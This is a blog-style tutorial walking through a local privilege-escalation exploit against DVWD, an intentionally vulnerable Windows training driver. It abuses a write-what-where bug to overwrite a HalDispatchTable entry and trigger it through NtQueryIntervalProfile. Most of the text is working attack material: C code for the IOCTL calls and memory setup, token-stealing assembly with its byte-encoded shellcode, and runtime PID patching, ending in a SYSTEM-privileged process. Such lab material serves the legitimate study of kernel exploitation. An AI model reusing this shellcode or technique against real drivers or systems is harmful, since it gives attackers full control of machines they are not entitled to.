Introduction to Windows Kernel Exploitation – DVWD.sys

Introduction

While in this days of DEP, ASLR, /GS, SafeSEH and SEHOP, (reliable) exploitation of userland applications is becoming more difficult with every new release of Windows; exploitation of Windows drivers is a fruit that hangs lower every other day and it’s becoming a major concern among security professionals. For this reason, and as there are not too many documents on the internet on this subject I decided to throw in my two cents and write this “Introduction to Windows Kernel Exploitation” article.

And as I still don’t master this topic, I may make some mistakes, in that case feel free to correct me.

DVWD – Damn Vulnerable Windows Driver

After finishing the sixth chapter of “A guide to kernel exploitation”, I decided to check out the accompanying driver and exploits to see if I could get privesc somehow. After compiling the exploit code with Visual Studio 2008 and running it, I failed to make the exploit work, because it was written for another platform.

So…that’s it. No luck this time. I didn’t get system.

Or if you don’t want to accept the results, and want to know how 1337 h4XX0rZ make their exploits, you can continue reading, and if you are smart enough, you’ll end this article with a fully functional exploit against the DVWD driver.
Okay, let’s see what DVWD does…

As I had access to the source code, I decided to have a look at it before trying to audit the IOCTL handler. Below is the IRP dispatch routine of the DVWD driver (taken from the source code of the driver).

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
DRIVER_UNLOAD DvwdUnload;
VOID DvwdUnload(PDRIVER_OBJECT DriverObject);

__drv_dispatchType(IRP_MJ_CREATE) DRIVER_DISPATCH DvwdCreate;
__drv_dispatchType(IRP_MJ_CLOSE) DRIVER_DISPATCH DvwdClose;
__drv_dispatchType(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DvwdIoControl;

DRIVER_DISPATCH DvwdNoFunction;
NTSTATUS __declspec(dllexport) DvwdHandleIoctlStackOverflow(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);
NTSTATUS DvwdHandleIoctlOverwrite(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);
NTSTATUS DvwdHandleIoctlStore(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);

You can read more about Windows drivers here.

By reading the C code of the driver I found out that it could handle five different IO control codes (from now on IOCTLs):

  • DEVICEIO_DVWD_STACKOVERFLOW – IOCTL code 0x801 – Copies a buffer from userland to a privileged buffer. No checks are made to the length of the buffer except for Probe, and as you’ll see, here resides a vulnerability.
  • DEVICEIO_DVWD_STORE – IOCTL code 0x805 – Copies a buffer from userland to the GlobalOverwriteStruct structure in kernelland.
  • DEVICEIO_DVWD_OVERWRITE – IOCTL code 0x802 – Retrieves the contents of the GlobalOverwriteStruct structure and copies it to a buffer on a specified address. The address is not checked, and as you will get to see later, here resides a vulnerability too.
  • DEVICEIO_DVWD_SHELLCODE – IOCTL code 0x803 – This IOCTL won’t be used in the process of exploitation
  • DEVICEIO_DVWD_SHELLCODEUSER – IOCTL code 0x804 – Irrelevant

Examining the utility of the IOCTLs

First of all, let’s see what those IOCTLs do

  • DEVICEIO_DVWD_STORE is handled by the function DvwdHandleIoctlStore(), that calls TriggerStore(). TriggerStore() checks if the pointer to the structure passed through the IOCTL belongs to userland by using ProbeForRead(); if it does belong to userland, TriggerStore calls SetSavedData to copy the contents of the buffer to a kernelland address. Before copying, SetSavedData calls ProbeForRead once again to check that the buffer to be copied resides in userland
  • DEVICEIO_DVWD_OVERWRITE is handled by the function DvwdHandleIoctlStore(), that calls TriggerOverwrite the same way TriggerStore was called by DvwdHandleIoctlStore(). TriggerOverwrite now calls GetSavedData, which copies the contents of the GlobalOverwriteStruct structure to a given address; the destination address is not checked in any way, and therefore, this allows us to copy it anywhere, including kernelland.
  • DEVICEIO_DVWD_OVERFLOW is handled by DvwdHandleIoctlStackOverflow(), this function makes a call to TriggerOverwrite(), where a vulnerable memcpy operation exists. A stack based buffer overflow can be triggered using this IOCTL.

With all that, we are able to determine that by (ab)using the IOCTLs DEVICEIO_DVWD_STORE and DEVICEIO_DVWD_OVERWRITE we can copy something from a buffer controlled by us in userland to an arbitrary address (userland or kernelland). This is called a write-what-where vulnerability.

To exploit this kind of vulnerability, as documented by Ruben Santamarta in his paper “Exploiting common flaws in drivers” it is possible to overwrite a pointer from a kernel dispatch table, given that a userland process has complete control of the parameters involved in the vulnerable memcpy call.

Below is a relevant fragment from Ruben Santamarta’s paper.

General Case:

  • Address overwritten is controlled
  • Value/Values we need to overwrite are controlled or the value is not controlled but is lower than MmUserProbeAddress.

Method: HalDispatchTable

HalDispatchTable

HalDispatchTable is an example of a kernel dispatch table. Dispatch tables store pointers and are used as a level of abstraction between two more layers. The Hardware Abstraction Layer (HAL) dispatch table is stored in the kernel executive (ntoskrnl.exe) or in ntkrnlpa.exe for systems with Physical Address Extension (PAE) support. This particular table holds the addresses of a few HAL routines. You can see the pointers held by HalDispatchTable with the aid of the kernel debugger.
HalDispatchTable-2

NtQueryIntervalProfile

NtQueryIntervalProfile is an undocumented function that retrieves currently set delay between performance counter’s ticks. Below is its’ syntax (taken from undocumented.sysinternals.net)

NtQueryIntervalProfile(
IN KPROFILE_SOURCE      ProfileSource,
OUT PULONG              Interval );

Internally, it calls KeQueryIntervalProfile, which is a function exported by the kernel executive. If we disassemble the function, we can see that a pointer from HalDispatchTable is used in a call, as the following screenshot shows (see 0x8065cea2).
KeQueryIntervalProfile

Therefore, if we place our code in userland, overwrite the second entry of HalDispatchTable (HalDispatchTable+0x4) with a pointer to our (shell)code (userland) and a ring3 process calls NtQueryIntervalProfile, our code will get executed with ring0 privileges.

Exploitation:

To be able to exploit this, a ring3 process will have to:

  1. Retrieve the address of HalDispatchTable and HalDispatchTable+0x4. We can do this by loading the kernel executive on userland, finding the offset to HalDispatchTable, and deducing the address of the *real* HalDispatchTable that sits in kernelland.
  2. Allocate RWX memory in userland and place our shellcode there.
  3. Overwrite the second entry of HalDispatchTable using a combination of the IOCTLs
  4. Call NtQueryIntervalProfile and elevate our privileges

Now, having a process with NT AUTHORITY\SYSTEM privileges, we can do whatever we want, like creating a user, spawning a system shell…
OK. Let’s start bulding an exploit…

Retrieve the address of HalDispatchTable
Nothing really difficult here. Just a couple of LoadLibrary calls and we’re all set

Allocate RWX memory in userland and place our shellcode there.
To allocate new memory, we will be using VirtualAlloc, a function that reserves or commits a page or a region of pages of memory to the virtual memory of the process that called the function. The syntax is the following:

LPVOID WINAPI VirtualAlloc(
  _In_opt_  LPVOID lpAddress,
  _In_      SIZE_T dwSize,
  _In_      DWORD flAllocationType,
  _In_      DWORD flProtect
);

So, we will be calling the function as follows:

LPVOID shellcodemem;
shellcodemem = VirtualAlloc(NULL, 512, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

Which, in essence, will allocate a region of 512 bytes of RWX memory at NULL (wherever the system wants); this memory will be automatically initialized to zero. The call will return a LPVOID pointer to the new memory.

Now, we have to fill the memory with something, so we can work comfortably later when copying the shellcode to it. This step is not really necessary.

I chose to fill the newly allocated memory region with NOP’s, so I will use a memset() call for this purpose. The syntax of the memset function is the following:

void *memset(
   void *dest,
   int c,
   size_t count
);

And to fill our newly allocated memory with NOPs, I will be calling memset with the following arguments:

memset(shellcodemem, '\x90', 512);

The above call will fill 512 bytes of the memory region to which shellcodemem points with NOPs.

Now, we have to copy our shellcode to the memory that we have just filled with NOP’s. We can do that using the memcpy function, which has the following syntax:

memcpy(shellcodemem, Shellcode, sizeof(Shellcode));

Where Shellcode is defined as follows:

char Shellcode[] = “\xCC”

Having that, the memcpy call will copy all the shellcode to the buffer that shellcodemem points to.

Second step done! Moving on

Overwrite the second entry of HalDispatchTable using a combination of IOCTLs

First of all, we will have to create a structure that contains the pointer to the shellcodemem buffer and the size of the pointer. We can use the following syntax for that:

typedef struct _ARBITRARY_OVERWRITE_STRUCT
{
  PVOID StorePtr;
  ULONG Size;
} ARBITRARY_OVERWRITE_STRUCT,*PARBITRARY_OVERWRITE_STRUCT;
ARBITRARY_OVERWRITE_STRUCT overwrite;

Having our structure created, we can now give values to overwrite.StorePtr and to overwrite.Size.

overwrite.Size = 4;
overwrite.StorePtr = (PVOID)&shellcodemem;

And now, with all in place we can send the first IOCTL to the driver, but for that it is mandatory to set up a handler and to #define each IOCTL. This can be done with the following code:

//Define IOCTLs
#define DEVICEIO_DVWD_OVERWRITE      CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define DEVICEIO_DVWD_STORE          CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
//Open a handle to the DVWD driver
HANDLE hDevice;
hDevice = CreateFile("\\\\.\\DVWD",
                        GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE,
                        NULL,
                        OPEN_EXISTING,
                        0,
                        NULL);

And with all in place we can send the first IOCTL that will retrieve the contents of the struct defined before (DEVICEIO_DVWD_STORE) and copy them to GlobalOverwriteStruct in kernelland. The IOCTL can be sent by calling DeviceIoControl() with the following parameters:

DWORD dwReturn
DeviceIoControl(hDevice, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

The goal of that request to the driver is to retrieve the contents of a buffer in userland and copy them to another buffer located in kernelland. We need to somehow retrieve the contents of the kernelland buffer and copy them to an arbitrary location (HalDispatchTable+0x4).To do that we can to send a second IOCTL to the driver, but before, we have to redefine the parameters passed via the pointer to the overwrite struct, because instead of performing an operation with the pointer to the shellcode, we will use a pointer to the second entry of HalDispatchTable+0x4.

overwrite.Size = 4; 						//This is not needed
overwrite.StorePtr = (PVOID)HalDispatchTableTarget;

And send the IOCTL…

DeviceIoControl(hDevice, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

And if everything was right, you should have seen something like this in your kernel debugger

Debugger view after successful IOCTLs
Now, if you go a bit further, you can inspect the contents of HalDispatchTable and see that it got overwritten.

Overwritten entry in HalDispatchTable

Now, if NtQueryIntervalProfile gets called, the shellcode (the breakpoint) should get executed/hit and the debugger should say so.

ULONG w00t=0;
NtQueryIntervalProfile(2, &w00t);

Breakpoint hit

But unless you want to DoS out the system you are working on, I suppose that executing a single breakpoint wit h kernel privileges will not be enough for you, and what’s more, if we can get privesc, why only DoS?

Shellcoding

Kernelland is not like userland; in this beautiful place code gets executed with full privileges, meaning that if you make any mistake with the shellcode, you’ll get a BSOD, so trust me, even “pop calc” shellcode from metasploit won’t work when being executed as SYSTEM.

When dealing with local kernel exploitation, the obtained code execution is used to do something like patching the access token of a given process with the token of a process with SYSTEM privileges. After that, we can do whatever we want from userland, as we have the token of a SYSTEM process.

Under Windows, access tokens are objects that define the security context of a process. The information held by tokens includes the identity and privileges of the user account associated with the process. Each time a user logs in, an access token is produced, and every process that the user launches holds a copy of the access token. When a process attempts to perform certain operations, the information held by the token is compared to the minimum privileges required to perform the said action. If the process has the privileges required, access is granted, if not, access is denied.

Below is the format of an internal Token object, displayed by issuing the dt nt!_TOKEN command in a kernel debugger.

+0x000 TokenSource          : _TOKEN_SOURCE
+0x010 TokenId              : _LUID
+0x018 AuthenticationId     : _LUID
+0x020 ParentTokenId        : _LUID
+0x028 ExpirationTime       : _LARGE_INTEGER
+0x030 TokenLock            : Ptr32 _ERESOURCE
+0x034 ModifiedId           : _LUID
+0x03c SessionId            : Uint4B
+0x040 UserAndGroupCount    : Uint4B
+0x044 RestrictedSidCount   : Uint4B
+0x048 PrivilegeCount       : Uint4B
+0x04c VariableLength       : Uint4B
+0x050 DynamicCharged       : Uint4B
+0x054 DynamicAvailable     : Uint4B
+0x058 DefaultOwnerIndex    : Uint4B
+0x05c UserAndGroups        : Ptr32 _SID_AND_ATTRIBUTES
+0x060 RestrictedSids       : Ptr32 _SID_AND_ATTRIBUTES
+0x064 PrimaryGroup         : Ptr32 Void
+0x068 Privileges           : Ptr32 _LUID_AND_ATTRIBUTES
+0x06c DynamicPart          : Ptr32 Uint4B
+0x070 DefaultDacl          : Ptr32 _ACL
+0x074 TokenType            : _TOKEN_TYPE
+0x078 ImpersonationLevel   : _SECURITY_IMPERSONATION_LEVEL
+0x07c TokenFlags           : Uchar
+0x07d TokenInUse           : Uchar
+0x080 ProxyData            : Ptr32 _SECURITY_TOKEN_PROXY_DATA
+0x084 AuditData            : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
+0x088 VariablePart         : Uint4B

So, back to the exploit, what are our options if we want to get our privileges elevated all the way up to system?

We can use shellcode that copies the access token of a process with system privileges and gives it to our userland process. This is called Token Stealing shellcode. Below is an example of shellcode that will copy a process’ token and give it to another Take some time to understand the utility of each instruction.

; Offsets
WINXP_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WINXP_EPROCESS_OFFSET  equ 044h    ; nt!_KTHREAD.ApcState.Process
WINXP_FLINK_OFFSET     equ 088h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WINXP_PID_OFFSET       equ 084h    ; nt!_EPROCESS.UniqueProcessId
WINXP_TOKEN_OFFSET     equ 0c8h    ; nt!_EPROCESS.Token
WINXP_SYS_PID          equ 04h     ; PID Process SYSTEM

pushad                                ; save registers

mov eax, fs:[WINXP_KTHREAD_OFFSET]   ; EAX mov eax, [eax+WINXP_EPROCESS_OFFSET] ; EAX push eax

mov ebx, WINXP_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX sub eax, WINXP_FLINK_OFFSET           ; EAX cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WINXP_TOKEN_OFFSET]     ; EDI and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX
mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX sub eax, WINXP_FLINK_OFFSET           ; EAX cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == PID of the process
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WINXP_TOKEN_OFFSET], edi     ; We replace the token of the process
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID
PartyIsOver:

popad                                 ; restore registers
ret

Credits for the shellcode go to Jeremy Brun (Xst3nZ), as it was him who used it in his exploit.

You can now replace the breakpoint we set earlier as with the *real* shellcode (taken from Xst3nZ’s exploit).

"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x44\x50\xBB\x04\x00\x00\x00"
"\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84\x00\x00"
"\x00\x75\xED\x8B\xB8\xC8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
"\x41\x41\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84"
"\x00\x00\x00\x75\xED\x89\xB8\xC8\x00\x00\x00\x61\xC3"

Shellcoding – Problems begin

Take a look at these ASM lines belonging to the shellcode:

mov ebx, 41414141h
SearchProcessPidToEscalate:
mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <-_EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX

The first instruction places 0x41414141 onto EBX – Nothing strange here. Moving on.

In lines three to five the shellcode tries to retrieve the location of a process with PID AAAA (41414141), then it copies the token of the previously located SYSTEM process (PID 4) and gives it to the process with PID AAAA. Take some time to understand how this is done. Of course, we cannot escalate a process with PID AAAA, simply because it does not exist, and therefore to escalate a specified process, the 41414141h has to be replaced with the PID of the current process or the process we want to escalate (in HEX).

One could try to spawn cmd.exe, open the task manager, look for the PID of cmd.exe, calculate its value in hex, modify the exploit, compile and run it; but it is also possible to modify the shellcode at runtime (after it has been placed in memory) using memcpy calls. But for that, the offset from the start of the allocated memory to 41414141 must be known. That can be easily obtained with the help of a userland debugger, by dd’ing (disassembling) the content of the memory where the shellcode was placed. But the exploit will have to use that offset to locate the PID parameter in the shellocode and replace it.

 int PidLoc_int;
int offset = 48; 		             // Offset to PID parameter
LPVOID PidLocation_LP;
PidLoc_int = (int)newmemory + offset;
PidLocation_LP = (LPVOID)PidLoc_int; 

And having a pointer to the hex string that has to be updated with the current process, I wrote the following to replace it.

char hexpid[8];
DWORD ProcessID = (DWORD)GetCurrentProcessId();
char i1 = (DWORD)ProcessID & 0x000000FF;
char i2 = ((DWORD)ProcessID & 0x0000FF00) >> 8;
char i3 = ((DWORD)ProcessID & 0x00FF0000) >> 16;
char i4 = ((DWORD)ProcessID & 0xFF000000) >> 24;
hexpid[0] = i1;
hexpid[1] = i2;
hexpid[2] = i3;
hexpid[3] = i4;
memcpy(PidLocation_LP, hexpid, sizeof(hexpid));   

Yes, I know that my code is buggy and that there is a lot of unncecessary conversion, but hey, I’m just a n00b to C++!

So, the purpose of the code above is to retrieve the current PID using GetCurrentProcessId(), divide it into four chars (using logical AND operations), copy the four chars into one and copy it to the previously calculated PID parameter location in memory (PidLocation_LP).

I verified that the shellcode was being updated correctly by adding a Sleep(xxxx) call after the code above, so I could have a chance to break into the debugger and inspect the shellcode.

Shellcoding – Problems continue

I compiled and ran my exploit, the shellcode got called, but NtQueryIntervalProfile never returned and the CPU went crazy.

CPU Running at its maximum capacity

So, what could be wrong?

Well, let’s start with what we know so far:

  • NtQueryIntervalProfile won’t return
  • The CPU is used to its maximum capacity when the shellcode gets called
  • If you kill the exploit process, the CPU keeps working to the max

If you have ever played with Egghunters, you may know that for a few seconds, while the egghunter is looking for the “egg(s)” in memory, the CPU gets to its maximum capacity, we have a similar scenario here.

All that points to an endless loop in the shellcode.

In the shellcode, there are two loops that are used to search for specific PIDs. To find out which one of them was causing problems I looked at the dissassembly of the shellcode while it was placed in memory. I also set breakpoints at the end of each one of the loops to find out the cause of the problem.

By looking at the disassembly I found out that the shellcode had been corrupted, and some of the instructions had been changed.

The following image shows the code that my program had placed in memory.

Corrupted shellcode placed in memory

I realized that the value expected to be in EAX was being popped from the stack at 0x003a002e and was being corrupted by the instructions at 0x003a0032, 0x003a0036 and 0x003a0038 . However, EAX was not used until 0x003a003a, and therefore I could wait until the two added instructions get executed to POP EAX; that way EAX still gets corrupted, but it gets fixed later so that it does not affect to the behavior of the exploit.

I also added some NOPs to have space to comfortably deal with the problem

Shellcode with NOPs

To get EAX fixed before it was used, I moved the POP EAX instruction from 0x003a002c to 0x003a0039 and placed a NOP where the POP EAX was. I adjusted the offsets and executed my exploit.

And…NtQueryIntervalProfile returned!!

This is very good. The shellcode was being executed correctly and therefore giving the exploit process SYSTEM privileges. No BSoD, no crash, nothing bad. At this point I only had to add a single statement in my exploit to get privilege escalation

system("calc.exe");

And… calc.exe got launched, with NTAUTHORITY\SYSTEM privileges. w00t!

w00t!

calc.exe running as SYSTEM

 Hope you enjoyed this article, and if you want my exploit, just drop me a message, but hey, no cheating!